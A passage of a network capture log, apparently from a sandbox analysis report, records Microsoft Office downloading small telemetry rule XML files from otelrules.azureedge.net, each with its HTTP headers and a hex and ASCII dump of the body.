                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            83192.168.2.44999913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:55 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:56 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                            x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175956Z-174f7845968pght8hC1EWRyvxg00000009f000000000700r
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:56 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            84192.168.2.45000013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:56 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:56 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                            x-ms-request-id: 212a65f3-801e-0047-41e7-447265000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175956Z-174f78459685726chC1EWRsnbg000000166g00000000v3b4
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:56 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            85192.168.2.45000313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:57 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 0fbdb1d5-101e-0079-0270-435913000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175957Z-174f78459685726chC1EWRsnbg00000016ag00000000d8m6
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            86192.168.2.45000513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:57 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175957Z-174f784596886s2bhC1EWR743w000000166g00000000uavt
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            87192.168.2.45000413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:57 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                            x-ms-request-id: 3b640fd5-a01e-0053-6c1f-418603000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175957Z-174f7845968pght8hC1EWRyvxg00000009cg00000000h49z
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            88192.168.2.45000613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:57 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:58 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4e964251-301e-000c-42c4-42323f000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175958Z-174f7845968pf68xhC1EWRr4h800000016kg000000006q80
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            89192.168.2.45000713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:58 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                            x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175958Z-174f7845968ljs8phC1EWRe6en000000161g00000000pycy
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:58 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            90192.168.2.45000913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:59 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                            x-ms-request-id: 2fc5819c-d01e-002b-4a95-4325fb000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180000Z-174f7845968ljs8phC1EWRe6en000000163g00000000evbv
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            91192.168.2.45001113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:59 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                            x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180000Z-174f7845968xr5c2hC1EWRd0hn0000000r3g00000000ek6n
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
